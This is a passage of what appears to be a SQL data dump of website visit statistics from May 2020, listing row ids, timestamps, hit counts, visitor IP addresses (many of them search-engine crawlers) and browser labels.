67,1589472597,8,8,0,0,'77.120.98.235','other'),(505268,1589472783,2,2,0,0,'207.46.13.0','other'),(505269,1589473365,1,1,0,0,'46.211.247.24','chrome'),(505270,1589473517,1,1,0,0,'66.249.70.70','chrome'),(505271,1589473805,1,1,0,0,'66.249.64.33','chrome'),(505272,1589474488,1,1,0,0,'207.46.13.163','other'),(505273,1589474575,1,1,0,0,'37.73.182.217','chrome'),(505274,1589474859,8,8,0,0,'77.120.98.235','other'),(505275,1589475330,1,1,0,0,'66.249.70.69','chrome'),(505276,1589476324,2,2,0,0,'207.46.13.163','other'),(505277,1589476350,1,1,0,0,'157.55.39.218','other'),(505278,1589476490,1,1,0,0,'207.46.13.0','other'),(505279,1589476812,2,2,0,0,'8.29.198.26','other'),(505280,1589477118,1,1,0,0,'66.249.70.72','chrome'),(505281,1589477145,8,8,0,0,'77.120.98.235','other'),(505282,1589478171,1,1,0,0,'66.249.70.72','chrome'),(505283,1589478596,4,3,1,0,'66.249.70.69',''),(505284,1589479240,1,1,0,0,'213.180.203.16','other'),(505285,1589479248,1,1,0,0,'66.249.70.70','chrome'),(505286,1589479473,8,8,0,0,'77.120.98.235','other'),(505287,1589479615,1,1,0,0,'107.178.194.198','chrome'),(505288,1589480275,1,1,0,0,'207.46.13.163','other'),(505289,1589480664,1,1,0,0,'66.249.70.69','chrome'),(505290,1589481695,8,8,0,0,'77.120.98.235','other'),(505291,1589482272,1,1,0,0,'157.55.39.218','other'),(505292,1589482330,1,1,0,0,'185.234.217.32','chrome'),(505293,1589483098,1,1,0,0,'178.154.200.220','other'),(505294,1589483629,1,1,0,0,'66.249.70.72','chrome'),(505295,1589483937,8,8,0,0,'77.120.98.235','other'),(505296,1589483984,1,1,0,0,'157.55.39.218','other'),(505297,1589484102,1,1,0,0,'213.180.203.16','other'),(505298,1589484492,1,1,0,0,'51.77.52.160','chrome'),(505299,1589485185,1,1,0,0,'207.46.13.163','other'),(505300,1589486158,1,1,0,0,'207.46.13.0','other'),(505301,1589486196,8,8,0,0,'77.120.98.235','other'),(505302,1589486414,1,1,0,0,'178.154.200.222','chrome'),(505303,1589486455,2,2,0,0,'157.55.39.218','other'),(505304,1589486762,1,1,0,0,'66.249.70.72','chrome'),(505305,1589486995,1,1,0,0,'66.249.70.70','chrome'),(505306,1589487146,1,1,0,0,'178.154.200.220','other'),(505307,1589487640,2,2,0,0,'8.29.198.27','other'),(505308,1589488119,1,1,0,0,'91.196.121.134','chrome'),(505309,1589488142,2,2,0,0,'207.46.13.0','other'),(505310,1589488433,1,1,0,0,'178.154.200.222','other'),(505311,1589488441,8,8,0,0,'77.120.98.235','other'),(505312,1589488588,1,1,0,0,'66.249.64.36','chrome'),(505313,1589489256,1,1,0,0,'178.154.200.97','other'),(505314,1589489722,1,1,0,0,'157.55.39.218','other'),(505315,1589489771,1,1,0,0,'66.249.70.70','chrome'),(505316,1589490479,1,1,0,0,'66.249.64.38','chrome'),(505317,1589490743,1,1,0,0,'207.46.13.0','other'),(505318,1589490765,8,8,0,0,'77.120.98.235','other'),(505319,1589491218,2,2,0,0,'207.46.13.41','other'),(505320,1589491790,1,1,0,0,'66.249.70.70','chrome'),(505321,1589491834,1,1,0,0,'66.249.70.69','chrome'),(505322,1589492327,1,1,0,0,'207.46.13.0','other'),(505323,1589493006,8,8,0,0,'77.120.98.235','other'),(505324,1589493408,1,1,0,0,'66.249.70.72','chrome'),(505325,1589493705,1,1,0,0,'207.46.13.0','other'),(505326,1589495206,8,8,0,0,'77.120.98.235','other'),(505327,1589495717,1,1,0,0,'66.249.70.70','chrome'),(505328,1589495946,2,2,0,0,'207.46.13.163','other'),(505329,1589497333,8,8,0,0,'77.120.98.235','other'),(505330,1589498471,1,1,0,0,'8.29.198.27','other'),(505331,1589498543,1,1,0,0,'157.55.39.218','other'),(505332,1589498728,1,1,0,0,'8.29.198.25','other'),(505333,1589499218,1,1,0,0,'207.46.13.163','other'),(505334,1589499545,8,8,0,0,'77.120.98.235','other'),(505335,1589500506,1,1,0,0,'62.205.134.182','other'),(505336,1589500699,1,1,0,0,'66.249.70.69','chrome'),(505337,1589501590,1,1,0,0,'207.46.13.163','other'),(505338,1589501777,8,8,0,0,'77.120.98.235','other'),(505339,1589501925,1,1,0,0,'157.55.39.42','other'),(505340,1589502027,1,1,0,0,'157.55.39.218','other'),(505341,1589502908,1,1,0,0,'178.154.200.220','other'),(505342,1589503103,1,1,0,0,'207.46.13.41','other'),(505343,1589503953,8,8,0,0,'77.120.98.235','other'),(505344,1589504515,1,1,0,0,'157.55.39.42','other'),(505345,1589504612,1,1,0,0,'207.46.13.41','other'),(505346,1589506008,8,8,0,0,'77.120.98.235','other'),(505347,1589506777,1,1,0,0,'195.128.17.206','other'),(505348,1589507989,1,1,0,0,'66.249.70.70','chrome'),(505349,1589508055,8,8,0,0,'77.120.98.235','other'),(505350,1589508389,1,1,0,0,'194.61.24.94','other'),(505351,1589509296,1,1,0,0,'8.29.198.25','other'),(505352,1589509557,1,1,0,0,'8.29.198.27','other'),(505353,1589510109,8,8,0,0,'77.120.98.235','other'),(505354,1589512130,8,8,0,0,'77.120.98.235','other'),(505355,1589512568,2,2,0,0,'66.249.70.69','chrome'),(505356,1589514064,1,1,0,0,'91.209.11.236','other'),(505357,1589514180,8,8,0,0,'77.120.98.235','other'),(505358,1589514637,1,1,0,0,'157.55.39.42','other'),(505359,1589514793,1,1,0,0,'66.249.70.69','chrome'),(505360,1589516041,2,2,0,0,'66.249.70.69','chrome'),(505361,1589516266,8,8,0,0,'77.120.98.235','other'),(505362,1589518011,1,1,0,0,'66.249.70.69','chrome'),(505363,1589518088,1,1,0,0,'62.205.134.182','other'),(505364,1589518158,1,1,0,0,'66.249.70.70','chrome'),(505365,1589518478,8,8,0,0,'77.120.98.235','other'),(505366,1589518726,1,1,0,0,'66.249.70.72','chrome'),(505367,1589519233,1,1,0,0,'66.249.70.69','chrome'),(505368,1589520123,1,1,0,0,'8.29.198.25','other'),(505369,1589520393,1,1,0,0,'8.29.198.27','other'),(505370,1589520604,1,1,0,0,'66.249.70.70','chrome'),(505371,1589520719,8,8,0,0,'77.120.98.235','other'),(505372,1589521118,2,2,0,0,'157.55.39.10','other'),(505373,1589522316,1,1,0,0,'185.76.69.18','chrome'),(505374,1589522944,1,1,0,0,'157.55.39.10','other'),(505375,1589522952,8,8,0,0,'77.120.98.235','other'),(505376,1589525171,8,8,0,0,'77.120.98.235','other'),(505377,1589525698,1,1,0,0,'178.128.254.230','firefox'),(505378,1589526123,1,1,0,0,'157.55.39.10','other'),(505379,1589526519,212,212,0,0,'108.59.8.80','other'),(505380,1589527088,1,1,0,0,'91.209.11.236','other'),(505381,1589527373,8,8,0,0,'77.120.98.235','other'),(505382,1589527422,17,17,0,0,'108.59.8.80','other'),(505383,1589528651,1,1,0,0,'66.249.70.70','chrome'),(505384,1589529187,2,2,0,0,'157.55.39.42','other'),(505385,1589529574,1,1,0,0,'91.196.177.69','chrome'),(505386,1589529605,8,8,0,0,'77.120.98.235','other'),(505387,1589529730,1,1,0,0,'91.196.178.79','chrome'),(505388,1589530002,2,2,0,0,'157.55.39.10','other'),(505389,1589530935,1,1,0,0,'91.196.178.79','chrome'),(505390,1589530948,1,1,0,0,'8.29.198.27','other'),(505391,1589531219,1,1,0,0,'8.29.198.26','other'),(505392,1589531803,1,1,0,0,'66.249.70.72','chrome'),(505393,1589531808,8,8,0,0,'77.120.98.235','other'),(505394,1589532671,1,1,0,0,'157.55.39.10','other'),(505395,1589534028,8,8,0,0,'77.120.98.235','other'),(505396,1589534795,1,1,0,0,'157.55.39.42','other'),(505397,1589536246,8,8,0,0,'77.120.98.235','other'),(505398,1589536558,1,1,0,0,'52.54.71.56','chrome'),(505399,1589536913,1,1,0,0,'157.55.39.10','other'),(505400,1589538175,1,1,0,0,'66.249.70.70','chrome'),(505401,1589538314,1,1,0,0,'66.249.64.36','chrome'),(505402,1589538466,8,8,0,0,'77.120.98.235','other'),(505403,1589538820,1,1,0,0,'157.55.39.42','other'),(505404,1589539736,1,1,0,0,'178.154.200.105','other'),(505405,1589539872,1,1,0,0,'66.249.70.70','chrome'),(505406,1589540119,1,1,0,0,'157.55.39.42','other'),(505407,1589540690,1,1,0,0,'66.249.64.38','chrome'),(505408,1589540692,8,8,0,0,'77.120.98.235','other'),(505409,1589540906,1,1,0,0,'213.180.203.16','other'),(505410,1589541435,1,1,0,0,'109.74.154.72','chrome'),(505411,1589541768,1,1,0,0,'8.29.198.26','other'),(505412,1589541885,2,2,0,0,'66.249.70.72','chrome'),(505413,1589541893,1,1,0,0,'94.153.23.8','chrome'),(505414,1589542044,1,1,0,0,'8.29.198.27','other'),(505415,1589542776,1,1,0,0,'178.154.200.196','other'),(505416,1589542864,1,1,0,0,'213.180.203.16','other'),(505417,1589542926,8,8,0,0,'77.120.98.235','other'),(505418,1589543032,1,1,0,0,'178.154.200.245','other'),(505419,1589543661,1,1,0,0,'66.249.70.72','chrome'),(505420,1589543838,1,1,0,0,'157.55.39.42','other'),(505421,1589544217,1,1,0,0,'213.180.203.90','other'),(505422,1589544222,1,1,0,0,'207.46.13.55','other'),(505423,1589545149,8,8,0,0,'77.120.98.235','other'),(505424,1589545565,1,1,0,0,'157.55.39.42','other'),(505425,1589545628,1,1,0,0,'66.249.70.72','chrome'),(505426,1589546894,1,1,0,0,'207.46.13.55','other'),(505427,1589546941,1,1,0,0,'66.249.70.70','chrome'),(505428,1589547006,2,2,0,0,'157.55.39.42','other'),(505429,1589547394,8,8,0,0,'77.120.98.235','other'),(505430,1589547451,1,1,0,0,'66.249.70.72','chrome'),(505431,1589547747,1,1,0,0,'178.154.200.222','other'),(505432,1589548936,1,1,0,0,'213.180.203.16','other'),(505433,1589549578,15,15,0,0,'88.198.33.145','other'),(505434,1589549663,16,16,0,0,'77.120.98.235','other'),(505435,1589549960,1,1,0,0,'94.153.3.236','other'),(505436,1589550407,2,2,0,0,'66.249.70.72','chrome'),(505437,1589550596,1,1,0,0,'207.46.13.55','other'),(505438,1589550753,54,54,0,0,'95.216.16.51','other'),(505439,1589551137,1,1,0,0,'157.55.39.42','other'),(505440,1589552315,8,8,0,0,'77.120.98.235','other'),(505441,1589552593,2,2,0,0,'8.29.198.25','other'),(505442,1589552968,1,1,0,0,'77.111.247.251','chrome'),(505443,1589553197,1,1,0,0,'46.211.0.7','chrome'),(505444,1589553379,1,1,0,0,'82.202.167.53','msie'),(505445,1589553389,1,1,0,0,'66.249.70.70','chrome'),(505446,1589554215,1,1,0,0,'94.181.81.34','chrome'),(505447,1589554542,8,8,0,0,'77.120.98.235','other'),(505448,1589554714,1,1,0,0,'207.46.13.65','other'),(505449,1589555495,1,1,0,0,'66.249.70.70','chrome'),(505450,1589556313,3,3,0,0,'207.46.13.4','other'),(505451,1589556459,1,1,0,0,'91.209.11.236','other'),(505452,1589556847,8,8,0,0,'77.120.98.235','other'),(505453,1589557106,1,1,0,0,'66.249.70.70','chrome'),(505454,1589557728,1,1,0,0,'207.46.13.4','other'),(505455,1589558150,2,2,0,0,'207.46.13.65','other'),(505456,1589559102,8,8,0,0,'77.120.98.235','other'),(505457,1589559139,1,1,0,0,'207.46.13.4','other'),(505458,1589560189,1,1,0,0,'66.249.70.70','chrome'),(505459,1589561228,1,1,0,0,'207.46.13.4','other'),(505460,1589561352,8,8,0,0,'77.120.98.235','other'),(505461,1589562480,1,1,0,0,'91.196.178.67','firefox'),(505462,1589562510,1,1,0,0,'207.46.13.4','other'),(505463,1589563423,1,1,0,0,'8.29.198.26','other'),(505464,1589563614,8,8,0,0,'77.120.98.235','other'),(505465,1589563701,1,1,0,0,'8.29.198.25','other'),(505466,1589565421,1,1,0,0,'69.171.251.11','other'),(505467,1589565422,1,1,0,0,'69.171.251.9','other'),(505468,1589565430,1,1,0,0,'207.46.13.65','other'),(505469,1589565876,8,8,0,0,'77.120.98.235','other'),(505470,1589566776,3,3,0,0,'207.46.13.4','other'),(505471,1589567420,1,1,0,0,'37.73.198.238','chrome'),(505472,1589567841,1,1,0,0,'66.249.70.69','chrome'),(505473,1589568124,8,8,0,0,'77.120.98.235','other'),(505474,1589568611,2,2,0,0,'207.46.13.252','other'),(505475,1589569348,2,2,0,0,'178.154.200.222','other'),(505476,1589569816,1,1,0,0,'66.249.70.69','chrome'),(505477,1589569904,1,1,0,0,'213.180.203.95','other'),(505478,1589569953,1,1,0,0,'66.249.70.70','chrome'),(505479,1589570164,1,1,0,0,'207.46.13.151','other'),(505480,1589570218,8,8,0,0,'77.120.98.235','other'),(505481,1589571061,1,1,0,0,'66.249.70.70','chrome'),(505482,1589571233,2,2,0,0,'207.46.13.65','other'),(505483,1589571509,1,1,0,0,'66.249.64.38','chrome'),(505484,1589571836,1,1,0,0,'207.46.13.252','other'),(505485,1589572425,8,8,0,0,'77.120.98.235','other'),(505486,1589572602,1,1,0,0,'178.154.200.220','other'),(505487,1589572740,1,1,0,0,'178.154.200.222','other'),(505488,1589572839,1,1,0,0,'213.180.203.16','other'),(505489,1589572975,1,1,0,0,'66.249.70.69','chrome'),(505490,1589573237,1,1,0,0,'159.203.98.41','firefox'),(505491,1589573467,3,3,0,0,'207.46.13.252','other'),(505492,1589573484,2,2,0,0,'54.166.131.175','chrome'),(505493,1589574047,1,1,0,0,'207.46.13.65','other'),(505494,1589574081,1,1,0,0,'91.196.178.161','chrome'),(505495,1589574261,1,1,0,0,'8.29.198.27','other'),(505496,1589574509,8,8,0,0,'77.120.98.235','other'),(505497,1589574531,1,1,0,0,'8.29.198.26','other'),(505498,1589575614,1,1,0,0,'178.154.200.220','other'),(505499,1589576598,8,8,0,0,'77.120.98.235','other'),(505500,1589577472,1,1,0,0,'207.46.13.65','other'),(505501,1589577599,1,1,0,0,'66.249.70.72','chrome'),(505502,1589577786,2,2,0,0,'207.46.13.252','other'),(505503,1589578082,1,1,0,0,'207.46.13.211','other'),(505504,1589578175,1,1,0,0,'178.154.200.222','other'),(505505,1589578285,1,1,0,0,'66.249.64.38','chrome'),(505506,1589578574,1,1,0,0,'207.46.13.65','other'),(505507,1589578707,8,8,0,0,'77.120.98.235','other'),(505508,1589579061,1,1,0,0,'66.249.64.33','chrome'),(505509,1589579127,1,1,0,0,'207.46.13.211','other'),(505510,1589579359,1,1,0,0,'178.154.200.92','other'),(505511,1589579734,1,1,0,0,'66.249.70.72','chrome'),(505512,1589579806,1,1,0,0,'66.249.70.69','chrome'),(505513,1589579895,1,1,0,0,'207.46.13.252','other'),(505514,1589580367,1,1,0,0,'66.249.70.70','chrome'),(505515,1589580515,1,1,0,0,'207.46.13.65','other'),(505516,1589580948,1,1,0,0,'178.154.200.222','other'),(505517,1589580974,8,8,0,0,'77.120.98.235','other'),(505518,1589581031,1,1,0,0,'66.249.64.38','chrome'),(505519,1589581524,1,1,0,0,'178.154.200.236','other'),(505520,1589581685,1,1,0,0,'207.46.13.211','other'),(505521,1589582333,1,1,0,0,'66.249.70.70','chrome'),(505522,1589583080,1,1,0,0,'207.46.13.211','other'),(505523,1589583252,8,8,0,0,'77.120.98.235','other'),(505524,1589583420,1,1,0,0,'207.46.13.252','other'),(505525,1589584416,1,1,0,0,'207.46.13.211','other'),(505526,1589585091,1,1,0,0,'8.29.198.27','other'),(505527,1589585354,1,1,0,0,'8.29.198.25','other'),(505528,1589585426,8,8,0,0,'77.120.98.235','other'),(505529,1589585672,1,1,0,0,'207.46.13.65','other'),(505530,1589585955,1,1,0,0,'66.249.64.36','chrome'),(505531,1589586552,1,1,0,0,'66.249.64.38','chrome'),(505532,1589586712,2,2,0,0,'213.180.203.16','other'),(505533,1589586907,1,1,0,0,'62.205.134.182','other'),(505534,1589587395,2,2,0,0,'66.249.70.70','chrome'),(505535,1589587616,1,1,0,0,'66.249.64.36','chrome'),(505536,1589587634,8,8,0,0,'77.120.98.235','other'),(505537,1589588218,1,1,0,0,'194.61.24.94','other'),(505538,1589588990,1,1,0,0,'207.46.13.211','other'),(505539,1589589810,8,8,0,0,'77.120.98.235','other'),(505540,1589590389,2,2,0,0,'178.154.200.222','other'),(505541,1589591921,8,8,0,0,'77.120.98.235','other'),(505542,1589592215,1,1,0,0,'178.154.200.222','other'),(505543,1589592284,1,1,0,0,'78.111.190.92','chrome'),(505544,1589592821,1,1,0,0,'66.249.70.69','chrome'),(505545,1589592982,3,3,0,0,'207.46.13.65','other'),(505546,1589593800,1,1,0,0,'213.180.203.16','other'),(505547,1589593972,8,8,0,0,'77.120.98.235','other'),(505548,1589594386,2,2,0,0,'207.46.13.252','other'),(505549,1589594874,1,1,0,0,'207.46.13.65','other'),(505550,1589595065,1,1,0,0,'94.130.71.60','other'),(505551,1589595347,1,1,0,0,'213.180.203.16','other'),(505552,1589595509,2,2,0,0,'207.46.13.211','other'),(505553,1589595917,1,1,0,0,'8.29.198.26','other'),(505554,1589595999,8,8,0,0,'77.120.98.235','other'),(505555,1589596110,1,1,0,0,'178.154.200.216','other'),(505556,1589596178,1,1,0,0,'8.29.198.27','other'),(505557,1589596445,1,1,0,0,'213.180.203.65','other'),(505558,1589596738,1,1,0,0,'207.46.13.211','other'),(505559,1589596889,1,1,0,0,'46.22.56.226','firefox'),(505560,1589596974,1,1,0,0,'207.46.13.65','other'),(505561,1589597490,1,1,0,0,'213.180.203.122','other'),(505562,1589597753,1,1,0,0,'178.154.200.236','other'),(505563,1589598079,8,8,0,0,'77.120.98.235','other'),(505564,1589598278,1,1,0,0,'213.180.203.65','other'),(505565,1589598332,1,1,0,0,'178.154.200.215','other'),(505566,1589598669,1,1,0,0,'207.46.13.252','other'),(505567,1589599301,1,1,0,0,'66.249.70.72','chrome'),(505568,1589599732,1,1,0,0,'66.249.70.70','chrome'),(505569,1589599856,1,1,0,0,'207.46.13.252','other'),(505570,1589599934,1,1,0,0,'66.249.64.36','chrome'),(505571,1589600097,8,8,0,0,'77.120.98.235','other'),(505572,1589600489,1,1,0,0,'66.249.70.72','chrome'),(505573,1589601396,2,2,0,0,'178.154.200.222','other'),(505574,1589602104,8,8,0,0,'77.120.98.235','other'),(505575,1589602198,1,1,0,0,'207.46.13.252','other'),(505576,1589602827,1,1,0,0,'207.46.13.211','other'),(505577,1589602841,1,1,0,0,'91.209.11.236','other'),(505578,1589602897,1,1,0,0,'66.249.64.33','chrome'),(505579,1589603502,1,1,0,0,'178.154.200.222','other'),(505580,1589603648,1,1,0,0,'66.249.70.72','chrome'),(505581,1589604114,2,2,0,0,'66.249.70.70','chrome'),(505582,1589604131,2,2,0,0,'66.249.70.69','chrome'),(505583,1589604219,8,8,0,0,'77.120.98.235','other'),(505584,1589604446,1,1,0,0,'62.205.134.182','other'),(505585,1589604525,2,2,0,0,'207.46.13.211','other'),(505586,1589604683,1,1,0,0,'66.249.70.72','chrome'),(505587,1589605265,1,1,0,0,'207.46.13.252','other'),(505588,1589605439,1,1,0,0,'209.17.96.178','other'),(505589,1589606322,1,1,0,0,'66.249.70.70','chrome'),(505590,1589606373,8,8,0,0,'77.120.98.235','other'),(505591,1589606614,2,2,0,0,'213.180.203.16','other'),(505592,1589606741,2,2,0,0,'8.29.198.26','other'),(505593,1589607356,1,1,0,0,'37.192.120.228','chrome'),(505594,1589608474,1,1,0,0,'207.46.13.211','other'),(505595,1589608557,2,2,0,0,'178.154.200.222','other'),(505596,1589608584,8,8,0,0,'77.120.98.235','other'),(505597,1589610176,1,1,0,0,'154.51.131.142','chrome'),(505598,1589610279,1,1,0,0,'213.180.203.29','other'),(505599,1589610639,2,2,0,0,'3.249.3.94','chrome'),(505600,1589610830,8,8,0,0,'77.120.98.235','other'),(505601,1589611472,1,1,0,0,'213.180.203.146','other'),(505602,1589612017,1,1,0,0,'66.249.64.36','chrome'),(505603,1589612480,1,1,0,0,'66.249.70.69','chrome'),(505604,1589613114,8,8,0,0,'77.120.98.235','other'),(505605,1589613669,1,1,0,0,'178.154.200.17','other'),(505606,1589613955,1,1,0,0,'207.46.13.182','other'),(505607,1589614109,1,1,0,0,'66.249.70.72','chrome'),(505608,1589614347,1,1,0,0,'131.220.6.152','chrome'),(505609,1589614738,1,1,0,0,'178.154.200.185','other'),(505610,1589615101,1,1,0,0,'207.46.13.182','other'),(505611,1589615380,8,8,0,0,'77.120.98.235','other'),(505612,1589616804,1,1,0,0,'213.180.203.109','other'),(505613,1589617191,1,1,0,0,'213.180.203.16','other'),(505614,1589617408,1,1,0,0,'209.17.96.250','other'),(505615,1589617445,1,1,0,0,'178.154.200.97','other'),(505616,1589617494,3,3,0,0,'178.154.200.222','other'),(505617,1589617569,1,1,0,0,'8.29.198.26','other'),(505618,1589617596,1,1,0,0,'66.249.70.69','chrome'),(505619,1589617601,8,8,0,0,'77.120.98.235','other'),(505620,1589617802,1,1,0,0,'207.46.13.182','other'),(505621,1589617827,1,1,0,0,'8.29.198.25','other'),(505622,1589618622,1,1,0,0,'213.180.203.16','other'),(505623,1589618639,1,1,0,0,'66.249.70.69','chrome'),(505624,1589618764,2,2,0,0,'66.249.70.72','chrome'),(505625,1589619521,1,1,0,0,'66.249.70.70','chrome'),(505626,1589619810,8,8,0,0,'77.120.98.235','other'),(505627,1589620202,4,4,0,0,'178.154.200.222','other'),(505628,1589620560,1,1,0,0,'207.46.13.182','other'),(505629,1589621078,1,1,0,0,'178.154.200.220','other'),(505630,1589621092,1,1,0,0,'66.249.70.69','chrome'),(505631,1589621550,1,1,0,0,'207.46.13.92','other'),(505632,1589621775,1,1,0,0,'178.154.200.222','other'),(505633,1589622052,8,8,0,0,'77.120.98.235','other'),(505634,1589622225,1,1,0,0,'207.46.13.182','other'),(505635,1589623894,1,1,0,0,'178.154.200.220','other'),(505636,1589623998,1,1,0,0,'66.249.70.69','chrome'),(505637,1589624281,8,8,0,0,'77.120.98.235','other'),(505638,1589624401,2,2,0,0,'66.249.64.33','chrome'),(505639,1589625359,2,2,0,0,'207.46.13.92','other'),(505640,1589625378,3,3,0,0,'66.249.70.69','chrome'),(505641,1589625895,1,1,0,0,'178.154.200.222','other'),(505642,1589626013,2,2,0,0,'207.46.13.182','other'),(505643,1589626285,1,1,0,0,'178.154.200.97','other'),(505644,1589626292,1,1,0,0,'66.249.70.72','chrome'),(505645,1589626473,8,8,0,0,'77.120.98.235','other'),(505646,1589627943,1,1,0,0,'109.74.154.72','chrome'),(505647,1589628389,1,1,0,0,'8.29.198.27','other'),(505648,1589628653,1,1,0,0,'8.29.198.25','other'),(505649,1589628748,8,8,0,0,'77.120.98.235','other'),(505650,1589629146,1,1,0,0,'66.249.70.72','chrome'),(505651,1589629955,1,1,0,0,'207.46.13.50','other'),(505652,1589629972,2,2,0,0,'207.46.13.182','other'),(505653,1589630973,2,2,0,0,'207.46.13.182','other'),(505654,1589630983,1,1,0,0,'207.46.13.92','other'),(505655,1589631226,1,1,0,0,'66.249.70.70','chrome'),(505656,1589631244,8,8,0,0,'77.120.98.235','other'),(505657,1589631552,1,1,0,0,'37.78.163.24','chrome'),(505658,1589632373,1,1,0,0,'207.46.13.92','other'),(505659,1589632379,2,2,0,0,'207.46.13.182','other'),(505660,1589632575,1,1,0,0,'157.55.39.196','other'),(505661,1589632837,1,1,0,0,'66.249.70.69','chrome'),(505662,1589633643,8,8,0,0,'77.120.98.235','other'),(505663,1589633981,1,1,0,0,'66.249.70.70','chrome'),(505664,1589634183,1,1,0,0,'207.46.13.182','other'),(505665,1589634532,2,2,0,0,'207.46.13.50','other'),(505666,1589635611,2,2,0,0,'157.55.39.196','other'),(505667,1589635768,1,1,0,0,'207.46.13.182','other'),(505668,1589635976,8,8,0,0,'77.120.98.235','other'),(505669,1589637314,1,1,0,0,'207.46.13.182','other'),(505670,1589638320,8,8,0,0,'77.120.98.235','other'),(505671,1589639000,2,2,0,0,'66.249.70.69','chrome'),(505672,1589639217,1,1,0,0,'8.29.198.26','other'),(505673,1589639474,1,1,0,0,'8.29.198.27','other'),(505674,1589639652,1,1,0,0,'178.95.157.65','chrome'),(505675,1589640114,1,1,0,0,'91.209.11.236','other'),(505676,1589640118,1,1,0,0,'66.249.70.72','chrome'),(505677,1589640622,1,1,0,0,'17.58.99.84','other'),(505678,1589640640,8,8,0,0,'77.120.98.235','other'),(505679,1589641136,1,1,0,0,'193.194.127.106','chrome'),(505680,1589642798,1,1,0,0,'66.249.70.69','chrome'),(505681,1589643088,8,8,0,0,'77.120.98.235','other'),(505682,1589643621,1,1,0,0,'66.249.70.72','chrome'),(505683,1589643991,2,2,0,0,'66.249.70.70','chrome'),(505684,1589644025,2,2,0,0,'207.46.13.92','other'),(505685,1589644100,1,1,0,0,'192.99.47.111','other'),(505686,1589644128,1,1,0,0,'192.99.47.111','chrome'),(505687,1589644141,1,1,0,0,'51.77.129.165','other'),(505688,1589644292,1,1,0,0,'62.210.177.44','chrome'),(505689,1589644312,1,1,0,0,'62.210.180.164','chrome'),(505690,1589645541,1,1,0,0,'91.209.11.236','other'),(505691,1589645584,8,8,0,0,'77.120.98.235','other'),(505692,1589645718,2,2,0,0,'157.55.39.196','other'),(505693,1589646023,1,1,0,0,'207.46.13.92','other'),(505694,1589646575,1,1,0,0,'66.249.70.70','chrome'),(505695,1589646905,1,0,1,0,'66.249.70.72',''),(505696,1589647786,1,1,0,0,'66.249.70.70','chrome'),(505697,1589648091,8,8,0,0,'77.120.98.235','other'),(505698,1589648145,1,1,0,0,'91.196.178.74','firefox'),(505699,1589648819,1,1,0,0,'157.55.39.196','other'),(505700,1589649154,1,1,0,0,'66.249.64.33','chrome'),(505701,1589650043,1,1,0,0,'8.29.198.26','other'),(505702,1589650295,1,1,0,0,'8.29.198.27','other'),(505703,1589650363,2,2,0,0,'66.249.64.36','chrome'),(505704,1589650707,8,8,0,0,'77.120.98.235','other'),(505705,1589651024,3,3,0,0,'3.22.61.213','chrome'),(505706,1589651170,1,1,0,0,'89.163.242.241','opera'),(505707,1589651307,1,1,0,0,'66.249.64.36','chrome'),(505708,1589651781,2,2,0,0,'66.249.70.70','chrome'),(505709,1589652016,2,2,0,0,'157.55.39.196','other'),(505710,1589652705,1,1,0,0,'178.154.200.222','other'),(505711,1589652907,1,1,0,0,'213.180.203.16','other'),(505712,1589653014,1,1,0,0,'66.249.70.70','chrome'),(505713,1589653448,8,8,0,0,'77.120.98.235','other'),(505714,1589653617,4,4,0,0,'178.154.200.222','other'),(505715,1589653735,2,2,0,0,'207.46.13.92','other'),(505716,1589653789,1,1,0,0,'66.249.70.72','chrome'),(505717,1589654125,1,1,0,0,'66.249.70.70','chrome'),(505718,1589654544,2,2,0,0,'178.154.200.222','other'),(505719,1589654900,1,1,0,0,'66.249.70.72','chrome'),(505720,1589654932,1,1,0,0,'76.217.31.195','chrome'),(505721,1589655234,1,1,0,0,'157.55.39.196','other'),(505722,1589655379,2,2,0,0,'213.180.203.16','other'),(505723,1589656302,3,3,0,0,'178.154.200.222','other'),(505724,1589656463,8,8,0,0,'77.120.98.235','other'),(505725,1589656735,1,1,0,0,'213.180.203.16','other'),(505726,1589657069,1,1,0,0,'66.249.70.70','chrome'),(505727,1589657538,1,1,0,0,'66.249.64.36','chrome'),(505728,1589657546,1,1,0,0,'66.249.70.69','chrome'),(505729,1589657562,1,1,0,0,'157.55.39.196','other'),(505730,1589657949,1,1,0,0,'213.180.203.16','other'),(505731,1589658269,2,2,0,0,'178.154.200.222','other'),(505732,1589658921,1,1,0,0,'91.196.178.157','chrome'),(505733,1589659358,6,6,0,0,'178.154.200.222','other'),(505734,1589659511,8,8,0,0,'77.120.98.235','other'),(505735,1589659617,1,1,0,0,'66.249.70.69','chrome'),(505736,1589660354,1,1,0,0,'213.180.203.16','other'),(505737,1589660519,1,1,0,0,'66.249.70.72','chrome'),(505738,1589660583,2,2,0,0,'178.154.200.222','other'),(505739,1589660712,1,1,0,0,'207.46.13.92','other'),(505740,1589660874,2,2,0,0,'8.29.198.27','other'),(505741,1589660914,1,1,0,0,'207.46.13.131','other'),(505742,1589661517,1,1,0,0,'178.154.200.220','other'),(505743,1589661571,7,7,0,0,'178.154.200.222','other'),(505744,1589662566,3,3,0,0,'178.154.200.222','other'),(505745,1589662627,1,1,0,0,'91.196.178.189','chrome'),(505746,1589662805,8,8,0,0,'77.120.98.235','other'),(505747,1589663470,1,1,0,0,'94.153.77.85','chrome'),(505748,1589664167,1,1,0,0,'207.46.13.131','other'),(505749,1589664401,3,3,0,0,'178.154.200.222','other'),(505750,1589665501,1,1,0,0,'178.154.200.222','other'),(505751,1589665670,1,1,0,0,'213.180.203.16','other'),(505752,1589666317,8,8,0,0,'77.120.98.235','other'),(505753,1589666347,1,1,0,0,'66.249.70.72','chrome'),(505754,1589666720,1,1,0,0,'207.46.13.131','other'),(505755,1589666931,1,1,0,0,'213.180.203.16','other'),(505756,1589667074,5,5,0,0,'178.154.200.222','other'),(505757,1589667647,1,1,0,0,'194.61.24.94','other'),(505758,1589668026,1,1,0,0,'213.180.203.16','other'),(505759,1589668601,1,1,0,0,'66.249.70.72','chrome'),(505760,1589668664,1,1,0,0,'178.154.200.222','other'),(505761,1589669425,1,1,0,0,'213.180.203.16','other'),(505762,1589669894,8,8,0,0,'77.120.98.235','other'),(505763,1589669912,3,3,0,0,'178.154.200.222','other'),(505764,1589670350,1,1,0,0,'66.249.70.70','chrome'),(505765,1589670886,3,3,0,0,'178.154.200.222','other'),(505766,1589671128,1,1,0,0,'66.249.70.72','chrome'),(505767,1589671705,1,1,0,0,'8.29.198.25','other'),(505768,1589671937,1,1,0,0,'8.29.198.26','other'),(505769,1589672242,1,1,0,0,'54.159.209.62','chrome'),(505770,1589672275,1,1,0,0,'66.249.70.70','chrome'),(505771,1589672437,1,1,0,0,'66.249.70.69','chrome'),(505772,1589672870,1,1,0,0,'207.46.13.84','other'),(505773,1589673250,8,8,0